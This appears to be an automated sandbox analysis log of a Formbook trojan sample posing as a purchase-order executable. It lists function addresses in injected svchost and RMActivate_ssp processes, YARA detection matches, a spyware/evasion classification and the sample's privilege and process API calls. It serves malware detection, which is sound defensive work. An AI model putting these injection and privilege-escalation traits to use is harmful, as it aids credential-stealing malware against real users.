            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004027002_2_00402700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C003E62_2_03C003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E3F02_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFA3522_2_03BFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC02C02_2_03BC02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE02742_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF41A22_2_03BF41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C001AA2_2_03C001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF81CC2_2_03BF81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA1182_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B301002_2_03B30100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC81582_2_03BC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD20002_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3C7C02_2_03B3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B407702_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B647502_2_03B64750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5C6E02_2_03B5C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C005912_2_03C00591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B405352_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEE4F62_2_03BEE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE44202_2_03BE4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF24462_2_03BF2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF6BD72_2_03BF6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFAB402_2_03BFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA802_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A02_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C0A9A62_2_03C0A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B569622_2_03B56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B268B82_2_03B268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E8F02_2_03B6E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4A8402_2_03B4A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B428402_2_03B42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBEFA02_2_03BBEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4CFE02_2_03B4CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32FC82_2_03B32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B60F302_2_03B60F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE2F302_2_03BE2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B82F282_2_03B82F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB4F402_2_03BB4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52E902_2_03B52E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFCE932_2_03BFCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFEEDB2_2_03BFEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFEE262_2_03BFEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40E592_2_03B40E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B58DBF2_2_03B58DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3ADE02_2_03B3ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDCD1F2_2_03BDCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4AD002_2_03B4AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0CB52_2_03BE0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30CF22_2_03B30CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40C002_2_03B40C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B8739A2_2_03B8739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF132D2_2_03BF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2D34C2_2_03B2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B452A02_2_03B452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE12ED2_2_03BE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5B2C02_2_03B5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4B1B02_2_03B4B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C0B16B2_2_03C0B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F1722_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7516C2_2_03B7516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF70E92_2_03BF70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFF0E02_2_03BFF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEF0CC2_2_03BEF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B470C02_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFF7B02_2_03BFF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF16CC2_2_03BF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B856302_2_03B85630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C095C32_2_03C095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDD5B02_2_03BDD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF75712_2_03BF7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFF43F2_2_03BFF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B314602_2_03B31460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5FB802_2_03B5FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB5BF02_2_03BB5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7DBF92_2_03B7DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFB762_2_03BFFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDDAAC2_2_03BDDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B85AA02_2_03B85AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE1AA32_2_03BE1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEDAC62_2_03BEDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB3A6C2_2_03BB3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFA492_2_03BFFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF7A462_2_03BF7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD59102_2_03BD5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B499502_2_03B49950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5B9502_2_03B5B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B438E02_2_03B438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAD8002_2_03BAD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFFB12_2_03BFFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B41F922_2_03B41F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B03FD22_2_03B03FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B03FD52_2_03B03FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFF092_2_03BFFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B49EB02_2_03B49EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5FDC02_2_03B5FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF7D732_2_03BF7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF1D5A2_2_03BF1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B43D402_2_03B43D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFCF22_2_03BFFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB9C322_2_03BB9C32
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D802C04_2_02D802C0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DA02744_2_02DA0274
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D0E3F04_2_02D0E3F0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DC03E64_2_02DC03E6
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DBA3524_2_02DBA352
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D920004_2_02D92000
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DB81CC4_2_02DB81CC
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DC01AA4_2_02DC01AA
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D881584_2_02D88158
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D9A1184_2_02D9A118
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02CF01004_2_02CF0100
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D1C6E04_2_02D1C6E0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02CFC7C04_2_02CFC7C0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D247504_2_02D24750
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D007704_2_02D00770
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DAE4F64_2_02DAE4F6
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DB24464_2_02DB2446
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DC05914_2_02DC0591
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D005354_2_02D00535
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02CFEA804_2_02CFEA80
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DB6BD74_2_02DB6BD7
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DBAB404_2_02DBAB40
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D2E8F04_2_02D2E8F0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02CE68B84_2_02CE68B8
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D0A8404_2_02D0A840
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D028404_2_02D02840
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D029A04_2_02D029A0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DCA9A64_2_02DCA9A6
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D169624_2_02D16962
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DBEEDB4_2_02DBEEDB
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D12E904_2_02D12E90
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DBCE934_2_02DBCE93
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D00E594_2_02D00E59
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DBEE264_2_02DBEE26
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02CF2FC84_2_02CF2FC8
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D0CFE04_2_02D0CFE0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D7EFA04_2_02D7EFA0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D74F404_2_02D74F40
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D20F304_2_02D20F30
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D42F284_2_02D42F28
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02CF0CF24_2_02CF0CF2
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DA0CB54_2_02DA0CB5
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D00C004_2_02D00C00
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02CFADE04_2_02CFADE0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D18DBF4_2_02D18DBF
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D0AD004_2_02D0AD00
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D1B2C04_2_02D1B2C0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DA12ED4_2_02DA12ED
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D052A04_2_02D052A0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D4739A4_2_02D4739A
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02CED34C4_2_02CED34C
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DB132D4_2_02DB132D
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D070C04_2_02D070C0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DAF0CC4_2_02DAF0CC
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DB70E94_2_02DB70E9
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DBF0E04_2_02DBF0E0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D0B1B04_2_02D0B1B0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DCB16B4_2_02DCB16B
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02CEF1724_2_02CEF172
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D3516C4_2_02D3516C
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DB16CC4_2_02DB16CC
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DBF7B04_2_02DBF7B0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02CF14604_2_02CF1460
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DBF43F4_2_02DBF43F
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D9D5B04_2_02D9D5B0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DB75714_2_02DB7571
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DADAC64_2_02DADAC6
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D45AA04_2_02D45AA0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D9DAAC4_2_02D9DAAC
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DBFA494_2_02DBFA49
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DB7A464_2_02DB7A46
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D73A6C4_2_02D73A6C
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D75BF04_2_02D75BF0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D3DBF94_2_02D3DBF9
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D1FB804_2_02D1FB80
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DBFB764_2_02DBFB76
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D038E04_2_02D038E0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D6D8004_2_02D6D800
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D099504_2_02D09950
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D1B9504_2_02D1B950
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D959104_2_02D95910
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D09EB04_2_02D09EB0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D01F924_2_02D01F92
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DBFFB14_2_02DBFFB1
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DBFF094_2_02DBFF09
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DBFCF24_2_02DBFCF2
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D79C324_2_02D79C32
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D1FDC04_2_02D1FDC0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DB1D5A4_2_02DB1D5A
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D03D404_2_02D03D40
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DB7D734_2_02DB7D73
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_00131AB04_2_00131AB0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_001351704_2_00135170
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_0013333B4_2_0013333B
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_001333404_2_00133340
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_0014B6C04_2_0014B6C0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_0012CA304_2_0012CA30
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_0012CA274_2_0012CA27
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_0012CC504_2_0012CC50
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_0012ACD04_2_0012ACD0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_0094E2D54_2_0094E2D5
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_0094E3FB4_2_0094E3FB
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_0094E78C4_2_0094E78C
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_0094D7F84_2_0094D7F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B75130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03BBF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03BAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B2B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B87E54 appears 111 times
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: String function: 02D35130 appears 57 times
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: String function: 02D7F290 appears 105 times
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: String function: 02CEB970 appears 275 times
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: String function: 02D47E54 appears 100 times
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: String function: 02D6EA12 appears 86 times
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: String function: 00AB7750 appears 42 times
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: String function: 00AAF885 appears 68 times
            Source: Purchase Order TE- 00011-7777.exe, 00000000.00000003.2050173418.00000000048BD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order TE- 00011-7777.exe
            Source: Purchase Order TE- 00011-7777.exe, 00000000.00000003.2049007327.00000000046C3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order TE- 00011-7777.exe
            Source: Purchase Order TE- 00011-7777.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2243312339.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3889597488.0000000004B70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3886646848.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3887684924.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2243639009.00000000039F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3887626598.00000000006D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2244045785.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.3887789383.0000000003A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@13/10
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00ADD712 GetLastError,FormatMessageW,0_2_00ADD712
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00ACB8B0 AdjustTokenPrivileges,CloseHandle,0_2_00ACB8B0
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00ACBEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00ACBEC3
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00ADEA85 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00ADEA85
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AD6F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_00AD6F5B
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AEC604 CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_00AEC604
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00A931F2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00A931F2
